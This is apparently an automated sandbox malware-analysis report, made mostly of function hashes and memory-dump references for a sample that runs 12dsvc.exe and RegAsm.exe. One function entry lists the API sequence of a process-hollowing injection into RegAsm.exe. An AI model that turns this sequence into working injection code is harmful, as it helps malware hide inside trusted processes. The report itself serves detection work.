Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69479139b2a0ce134fbca901b9ca8b1d1fe5d241d82892e0337a0aa13ad27822
Instruction ID: c61eb6fac099f9ffbbc701d468ab981c68819b341e4e24dd3b24fc9c16f22679
Opcode Fuzzy Hash: 69479139b2a0ce134fbca901b9ca8b1d1fe5d241d82892e0337a0aa13ad27822
Instruction Fuzzy Hash: 3B0146B4D0825ADFCF54CFA4D5496EEBFB0BB0A300F2455A9E424A7380D7340A81DB90

Function 065BB638 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c5ec2f97f82cfee7f3e55aac76e6944506406e0c2d549a4d88ed70a17f7cee6
Instruction ID: f62296bd8f3d3b5799c347881f61681dd8eee15089917c0e3d7dcf249aec3a02
Opcode Fuzzy Hash: 8c5ec2f97f82cfee7f3e55aac76e6944506406e0c2d549a4d88ed70a17f7cee6
Instruction Fuzzy Hash: 76F03C74A01208EFCB05FFB8E98995CBBB1FF48201F1441ADD806E7252DB346E449B51

Function 065B9294 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68222a585ed4b38276cfb058ae08e01bcd6c1445edd36ee06f65d9e7253b9723
Instruction ID: 7c9ef9f4c4771c484797433d62e54d55230f1f30805b7f12362010806287dc46
Opcode Fuzzy Hash: 68222a585ed4b38276cfb058ae08e01bcd6c1445edd36ee06f65d9e7253b9723
Instruction Fuzzy Hash: CEF0BEB5D082849FD755EFA0E861BADBB70FB82300F0041DAC4458B3A4D7349A41CB81

Function 065BC3E0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6a6172c9a3c649315c565113d9c71eaf6de92659ebcdf7fc28f84fa37998528
Instruction ID: 2b451a3fbd551acba05efc69de8b9a3f5cfc48294dfa8f5925ae66c6325bb8c9
Opcode Fuzzy Hash: c6a6172c9a3c649315c565113d9c71eaf6de92659ebcdf7fc28f84fa37998528
Instruction Fuzzy Hash: 39F090302097D18FC313E738E95869A7FE29F86204B08089ED186CB653DAA56C09C792

Function 065BB4C8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5825592e9728853e5ae898bdd53710d7c286645ea4d69d8f935c02bc32b35ee7
Instruction ID: dabbfc1d96a8561dad7acb5eec27480e204c5d5024bbe82a008fa1087ca822ab
Opcode Fuzzy Hash: 5825592e9728853e5ae898bdd53710d7c286645ea4d69d8f935c02bc32b35ee7
Instruction Fuzzy Hash: 21E092313002006FC314BB5AE888A9EBBDAEFC9365F40412DF20EC3242CA755C054BA1

Function 065B5698 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cac5d0e6316add46d72e9b21e586bc548fca0efb19f8f560619b21b36fc8854d
Instruction ID: 843dd10011f25cd9c4ed3755ceb2ffc98633bd34d02b1ab511b2b3f88d030702
Opcode Fuzzy Hash: cac5d0e6316add46d72e9b21e586bc548fca0efb19f8f560619b21b36fc8854d
Instruction Fuzzy Hash: 16E092B310D220AFC345DF34AC048977FE9EF91220B02887EF044C7141E631D840CBA5

Function 065BC450 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a9807beeaf1132e678e90e503756710ac47faa21b37edeee5e858a699cb24b
Instruction ID: b23f864ec370cff514fa9a5096bcda03704e79c29fab6a253c6bdc0a429e778e
Opcode Fuzzy Hash: 37a9807beeaf1132e678e90e503756710ac47faa21b37edeee5e858a699cb24b
Instruction Fuzzy Hash: 48F09074501B01CFD765EF26E608956BBF6FB88301700862EE84B83A12DB70A80ACF84

Function 065B834F Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c383b6be6037ec5d52582f024b3b51df3cf1d859e3809227725f95902013be75
Instruction ID: 507985c6404fbd790a0fda205167275c87a0ebf633b452e437a14214c093a423
Opcode Fuzzy Hash: c383b6be6037ec5d52582f024b3b51df3cf1d859e3809227725f95902013be75
Instruction Fuzzy Hash: F8E04872F100159B5F50DAA9AD486FFB7EDFB841517084537D718D3200FB30C51997A0

Function 065BAF40 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d26cf52271344d025354e10833ec7a0a2aa81347a49f4e9e27a0161fd24c007e
Instruction ID: 9066526b80f0c0e69f0ec0714feb829610bd7a571a9e0ca4e73a419b1e860e23
Opcode Fuzzy Hash: d26cf52271344d025354e10833ec7a0a2aa81347a49f4e9e27a0161fd24c007e
Instruction Fuzzy Hash: 56E0D8303142A56BC716F638A85849F7B9AEBC5211B04012AF60ACB141CE744D0683E6

Function 065BC3F0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cba150b7ad4bf48e87aa6b32ca5023292622fb7161fa2435a84c8a201dcc443
Instruction ID: 08bd78e3a7354c325e5fa41b2390fdf5de94313e7868b2347e0fe41398a86737
Opcode Fuzzy Hash: 7cba150b7ad4bf48e87aa6b32ca5023292622fb7161fa2435a84c8a201dcc443
Instruction Fuzzy Hash: 35E065342007518FC711E729E50879E7BE6DFC5319F04052DE646C7642CFB5AC058B91

Function 065BCF10 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30a5b71559022b0cee0159299c529982adba532a46a0df262a8b8e72b0b76119
Instruction ID: 98fa9530bdbb8fce94b2aad2ebc93426da0267b293542f0770612a3d1af6ed43
Opcode Fuzzy Hash: 30a5b71559022b0cee0159299c529982adba532a46a0df262a8b8e72b0b76119
Instruction Fuzzy Hash: 6DE0D8321093804FC702EB29FC905DD7FA0DE5A210705458DC485CB247D6346D0DE782

Function 065B9248 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6c6b563a4421c87db7c0798c8376235c44c822ed0ef3376324ecfabde7c4006
Instruction ID: 2daa5885d0b7b9fea4067d1f8c294dffc60314eed2530284f12640735930b4b6
Opcode Fuzzy Hash: f6c6b563a4421c87db7c0798c8376235c44c822ed0ef3376324ecfabde7c4006
Instruction Fuzzy Hash: 62F03974E00209AFCB94EFA5E851BADB7B5AB45300F1081A8C81497394EB706D40CF80

Function 065B91DA Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5c30e76b0650a11e96f835bc66456b46aef67e6faa02c343fe391aa0bac1b4a
Instruction ID: 891106bcb2050914de6fda75c6889e71ca1ba30489911131545aaa35ca4c3dc1
Opcode Fuzzy Hash: f5c30e76b0650a11e96f835bc66456b46aef67e6faa02c343fe391aa0bac1b4a
Instruction Fuzzy Hash: 14E02631608A844FD3A1D6A4CA906A2BFF1EF8920031889AAD65DCBB55D932DC01C740

Function 065B9247 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a61b720975235e88ddaed405218fcc2e967e0bca0993390a96a5a2002e6ce64b
Instruction ID: 1958ea5866b8b9e3cf3cacd28ffbbe017ab0eea5108195ffd91fd518493e06af
Opcode Fuzzy Hash: a61b720975235e88ddaed405218fcc2e967e0bca0993390a96a5a2002e6ce64b
Instruction Fuzzy Hash: 1FE09274E442469FCB64EF64E851BADB7B1BB42310F204299C964973E4C7701D42CB81

Function 065BEBB8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef0ed7db549b1923540e54d9cdbe5944ded8773ac7fdd3332ea8ac1d54caa84c
Instruction ID: d321de6db2adaa718c79f7478c03db896152bfc373e0b4c2530a7a0a0069ab3b
Opcode Fuzzy Hash: ef0ed7db549b1923540e54d9cdbe5944ded8773ac7fdd3332ea8ac1d54caa84c
Instruction Fuzzy Hash: 1DE01739214244AFC742DF68D890CA57FB9BF6A71034444CAF5418F6B2DB32A925EFA1

Function 065BE4C0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 240980a3c1c70a6e6de4df83ab282f1a904b8402b240be99a625d5c55931a54c
Instruction ID: 2adf111b9fe10223d6f6c0bc382233452cd09e34a6d9b8e4bcba3cde12666567
Opcode Fuzzy Hash: 240980a3c1c70a6e6de4df83ab282f1a904b8402b240be99a625d5c55931a54c
Instruction Fuzzy Hash: E3E04FF2A05348EFCB42DBB4E9419AD7BB1AF95205F1045DAD448D7353E6304F149B91

Function 065BAF50 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d8241b3bc756a34f1459f1ecb91acfe381d7638abf4b556e312003d814b6875
Instruction ID: 0275195420cd3870465d9d81cef62d846e70330d687aa2b36834dadee2b56020
Opcode Fuzzy Hash: 3d8241b3bc756a34f1459f1ecb91acfe381d7638abf4b556e312003d814b6875
Instruction Fuzzy Hash: A4D05B71300355978705B775F4584AF779BEBC96623000129E70BC7640CE755D0747E6

Function 065BB7DF Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cd239f5495c5bee245a17bd859016694fe13df52d12f76471d93d6170bec4de
Instruction ID: 55253bba0559163d784a12a420e368722362988ff5823fb4f5919464e7d1e63e
Opcode Fuzzy Hash: 4cd239f5495c5bee245a17bd859016694fe13df52d12f76471d93d6170bec4de
Instruction Fuzzy Hash: BEE07575D0510CEFCF42DFA5D5488DDBFB5EB48200F1082AAD806A3211E6351B55DF40

Function 065BB7E0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1094147b82f84717394746e96a0eca4243d01da9596316d31c2d7b8568d2edb3
Instruction ID: ff2e95242b7e8d7caac7c52c196221c388f356aca5814f79536d5f58aa6784ab
Opcode Fuzzy Hash: 1094147b82f84717394746e96a0eca4243d01da9596316d31c2d7b8568d2edb3
Instruction Fuzzy Hash: 52E09A75D0020CEFCB41DFE5D5488DDBBB9EB48200F1082AAD805A3201EB356B55DF80

Function 065BE540 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2e9a084cc46e8ebc08f5493d9479585b563e55cf91f04a974e6fc82d49bf57d
Instruction ID: f00f6815f29d1532782954b1fadc91295787b78b5fd26a1399cf3ad8cef4ac70
Opcode Fuzzy Hash: d2e9a084cc46e8ebc08f5493d9479585b563e55cf91f04a974e6fc82d49bf57d
Instruction Fuzzy Hash: 5CE08C305002188BCB58FB14FD9AF9933A5FB88B19F11101CD8118B6ABCB702E8A9B95

Function 065BE4D0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 943a7e679eccd4b0b4aa23e0166868167a2ba366cdb30d2f7959cf7c4069cfe5
Instruction ID: 335168674feeb9e6d609a0226b44aa3ab4c2f95e56c7a93b0eb2aa690d94159d
Opcode Fuzzy Hash: 943a7e679eccd4b0b4aa23e0166868167a2ba366cdb30d2f7959cf7c4069cfe5
Instruction Fuzzy Hash: A3D05EB1A0020CFFCB40EFA8ED4195DB7B9EF84215F1041ADD508E7302EA316F109B91

Function 065BFBAA Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5bbd57d0390336436419edb5c9e38262ab670fd1e4e326c4c6cd62da292f8be
Instruction ID: 92a942d91c30ed51d1bedb8bdfd670a56064c4d48fe20c19bb0d2643121cc3d3
Opcode Fuzzy Hash: f5bbd57d0390336436419edb5c9e38262ab670fd1e4e326c4c6cd62da292f8be
Instruction Fuzzy Hash: 8CD012B27401204F4248EA6CB06442E7AE3EBEC2A7395007EE70AC738ADE749C469780

Function 065B3721 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2286923212.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_65b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98887b23e86fb98351491825f873618a792208204f5c74730468812230ee0327
Instruction ID: 15b0879542f3fa61e956a3b9da4f552daeba20439d4cd409270f640a87be4516
Opcode Fuzzy Hash: 98887b23e86fb98351491825f873618a792208204f5c74730468812230ee0327
Instruction Fuzzy Hash: BCC08C3100E7D03FC71367602C09FA33E25EBD2700F064083B2888E09381A209A8D7F3

Non-executed Functions

Function 089D9638 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2306508641.00000000089D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_89d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c260127e71551a833fdcabc07bb6dc7a957d80b8ca8de1483f660e23b62e52c
Instruction ID: 77d74dd3f5552b6fae9063ec688dfc0f21dc98d482d608a9fbda4b5d9dd08884
Opcode Fuzzy Hash: 9c260127e71551a833fdcabc07bb6dc7a957d80b8ca8de1483f660e23b62e52c
Instruction Fuzzy Hash: 29C1B570E01218CFDB24EFA5C99079EBBF2BF89305F20C5A9D409AB255DB345986CF54

Function 089D5341 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2306508641.00000000089D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_89d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69e21ace6df98066e8b24b2b4f14b27f66a7d1cd2ac7ba91bbc86cea03783b82
Instruction ID: 8b07d0cf3f7669eb0004b15a14261ef82653485e23168a077bd8a35d3a2020fe
Opcode Fuzzy Hash: 69e21ace6df98066e8b24b2b4f14b27f66a7d1cd2ac7ba91bbc86cea03783b82
Instruction Fuzzy Hash: 84C19E74E01218CFDB54DFA9C890B9DBBB2BF89300F2085AAD409AB355DB359E46CF54

Function 089D5350 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2306508641.00000000089D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_89d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74149dce3ff29328f09eada07438679e90c6a459c7db8b3bee2cf6f75a4f4416
Instruction ID: b8ff817a6e1e089aa4c335eb0538c2cd835fa1a8436f0a9d3e69b86d4fcc1f2b
Opcode Fuzzy Hash: 74149dce3ff29328f09eada07438679e90c6a459c7db8b3bee2cf6f75a4f4416
Instruction Fuzzy Hash: 5AC19E74E01218CFDB54DFA9C890B9DBBB2BF89300F2085AAD409AB354DB359E46CF54

Function 06872E88 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2292175582.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6870000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f15e7641cab9d8f6a57afb1adb397c27132b0209814072e6812702f35fbdcf7a
Instruction ID: d6a89ba9bdffd728a402fde2cfecbfd81052a279ab2602c3f8dc7c983ea25605
Opcode Fuzzy Hash: f15e7641cab9d8f6a57afb1adb397c27132b0209814072e6812702f35fbdcf7a
Instruction Fuzzy Hash: 3C61CD74E00208DFDB54DFA9C880ADDBBB2FF89310F648029E509BB261DB34A946CF54

Function 089D8D68 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2306508641.00000000089D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_89d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6b09ae551254c1e903d8fc77537c6a6b3875bb0695dce8249bde9ac6de570ba
Instruction ID: 363b1e1be49c6ed3ca5b9f08dc9079efc3823d818e78e6ce2e0e198e3813b320
Opcode Fuzzy Hash: c6b09ae551254c1e903d8fc77537c6a6b3875bb0695dce8249bde9ac6de570ba
Instruction Fuzzy Hash: 6671E574E01318CFDB28EFA9D884AADBBB2BF89301F209829D415BB355DB359941CF54

Function 089D7DAF Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2306508641.00000000089D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_89d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 288a8de8fb164922e11a162b249bad48a4849b98de91de45b243860c339b5398
Instruction ID: 46298a91d976a26420362fb298e42237157b700d8af2d9ba170d33d0459b8717
Opcode Fuzzy Hash: 288a8de8fb164922e11a162b249bad48a4849b98de91de45b243860c339b5398
Instruction Fuzzy Hash: CDE01A30C4620EEEDB24AFD5C055BFEFA78AB85316F209889C40577A50CF744A468F69

Function 089D4A24 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2306508641.00000000089D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_89d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64485422161d0fa480562044e6058bf0e46c6880b58265ae1827a04e14d58d20
Instruction ID: e5b0b3ed598c853eb90ade83b7d1d4dde3f2294beba90499c8d6a56ebb91b186
Opcode Fuzzy Hash: 64485422161d0fa480562044e6058bf0e46c6880b58265ae1827a04e14d58d20
Instruction Fuzzy Hash: DAF07574D4431ACFDB28AF54D8997BEBA74BB0630AF10D959D10A73280CB744A85DF8D

Analysis Process: 12dsvc.exePID: 2240, Parent PID: 6560COMMON

Execution Graph

Execution Coverage:	30.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	20
Total number of Limit Nodes:	0

Executed Functions

Function 026A2189 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,026A20FB,026A20EB), ref: 026A22F8
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 026A230B
Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 026A2329
ReadProcessMemory.KERNELBASE(0000008C,?,026A213F,00000004,00000000), ref: 026A234D
VirtualAllocEx.KERNELBASE(0000008C,?,?,00003000,00000040), ref: 026A2378
WriteProcessMemory.KERNELBASE(0000008C,00000000,?,?,00000000,?), ref: 026A23D0
WriteProcessMemory.KERNELBASE(0000008C,00400000,?,?,00000000,?,00000028), ref: 026A241B
WriteProcessMemory.KERNELBASE(0000008C,?,?,00000004,00000000), ref: 026A2459
Wow64SetThreadContext.KERNEL32(0000009C,04DE0000), ref: 026A2495
ResumeThread.KERNELBASE(0000009C), ref: 026A24A4

Strings

ReadProcessMemory, xrefs: 026A2276
ress, xrefs: 026A2213
VirtualAlloc, xrefs: 026A2250
CreateProcessA, xrefs: 026A223D
SetThreadContext, xrefs: 026A22AF
GetThreadContext, xrefs: 026A2263
ResumeThread, xrefs: 026A22C5
aryA, xrefs: 026A21CF
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 026A22F7
GetP, xrefs: 026A220B
Load, xrefs: 026A21C7
VirtualAllocEx, xrefs: 026A2289
TerminateProcess, xrefs: 026A2387
WriteProcessMemory, xrefs: 026A229C

Memory Dump Source

Source File: 0000000E.00000002.2050468140.00000000026A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 026A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26a1000_12dsvc.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: b4f91145f9084f72195fa642233f6f58f5cb21b2de83ef473c44e9719377299b
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: E3B1E47664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CAB341D774FA518B94

Function 00DC1270 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00DC12F0

Memory Dump Source

Source File: 0000000E.00000002.2050342237.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_dc0000_12dsvc.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0c85d986fbbbac59167ef82e2c4bf2006f7047f26618daee4964d9710f218f64
Instruction ID: 19127cd0083d6df5a35227d41163d00e1f3a4e6c3943ca3daaddb0cdd58e179c
Opcode Fuzzy Hash: 0c85d986fbbbac59167ef82e2c4bf2006f7047f26618daee4964d9710f218f64
Instruction Fuzzy Hash: D22102B58002599FDB10DFAAC881BDEFBF4FF48310F10842AE919A7240C775A900CBA1

Function 00DC126F Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00DC12F0

Memory Dump Source

Source File: 0000000E.00000002.2050342237.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_dc0000_12dsvc.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: fb320c2cd0a7863b43a1d6c13a09352e33ae88d6582df1618789ac055cd25f68
Instruction ID: 249f3e3b223bb863c321a332708ee927f4652118a02d7fbff9d850f6c497f997
Opcode Fuzzy Hash: fb320c2cd0a7863b43a1d6c13a09352e33ae88d6582df1618789ac055cd25f68
Instruction Fuzzy Hash: A121F0B58002599FDB10DFAAD881AEEBBF0FF48310F14842EE959A7250C7759904CBA1

Analysis Process: RegAsm.exePID: 2836, Parent PID: 2240COMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	53

Executed Functions

Function 0041FEAF Relevance: 13.8, APIs: 9, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041FB65: CreateFileW.KERNELBASE(?,00000000,?,0041FF58,?,?,00000000,?,0041FF58,?,0000000C), ref: 0041FB82

GetLastError.KERNEL32 ref: 0041FFC3
__dosmaperr.LIBCMT ref: 0041FFCA
GetFileType.KERNELBASE(00000000), ref: 0041FFD6
GetLastError.KERNEL32 ref: 0041FFE0
__dosmaperr.LIBCMT ref: 0041FFE9
CloseHandle.KERNEL32(00000000), ref: 00420009
CloseHandle.KERNEL32(?), ref: 00420156
GetLastError.KERNEL32 ref: 00420188
__dosmaperr.LIBCMT ref: 0042018F

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

